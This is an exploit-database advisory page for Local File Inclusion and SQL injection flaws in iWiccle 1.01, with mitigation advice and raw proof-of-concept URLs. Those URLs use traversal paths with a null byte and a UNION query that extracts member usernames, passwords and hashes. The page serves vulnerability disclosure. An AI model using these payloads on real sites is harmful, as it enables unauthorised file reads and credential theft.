header-logo
Suggest Exploit
vendor:
iWiccle
by:
SirGod
8,8
CVSS
HIGH
Local File Inclusion and SQL Injection
22, 89
CWE
Product Name: iWiccle
Affected Version From: 1.01
Affected Version To: 1.01
Patch Exists: NO
Related CWE: N/A
CPE: a:wiccle:iwiccle
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

iWiccle 1.01 (LFI/SQL) Multiple Remote Vulnerabilities

iWiccle 1.01 is vulnerable to both Local File Inclusion and SQL Injection. An attacker can exploit these vulnerabilities by sending crafted requests to the application. For Local File Inclusion, an attacker can send a crafted request to the application with a malicious file path in the ‘module’ parameter. For SQL Injection, an attacker can send a crafted request to the application with a malicious SQL query in the ‘member_id’ parameter.

Mitigation:

To mitigate the Local File Inclusion vulnerability, the application should validate the user input and restrict the access to the application to only trusted users. To mitigate the SQL Injection vulnerability, the application should use parameterized queries and input validation.
Source

Exploit-DB raw data:

###########################################################################################
[+] iWiccle 1.01 (LFI/SQL) Multiple Remote Vulnerabilities
[+] Discovered By SirGod
[+] http://insecurity-ro.org
[+] http://h4cky0u.org
############################################################################################

[+] Download : http://www.wiccle.com/index.php?module=wiccle&show=download

[+] Local File Inclusion

 - PoC's

     http://127.0.0.1/[path]/index.php?module=../../../../../../bootsect.bak%00

     http://127.0.0.1/[path]/index.php?module=admin&show=../../../../../../bootsect.bak%00


[+] SQL Injection

 - PoC

   http://127.0.0.1/[path]/index.php?module=admin&show=users&area=manage_users&action=edit_user&member_id=null+union+all+select+1,2,3,4,concat_ws
(0x3a,member_username,member_password,member_hash),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41+from+w_members+where+member_id=1--

############################################################################################

# milw0rm.com [2009-07-27]

Navigation

Suggest Exploit

Services By CQR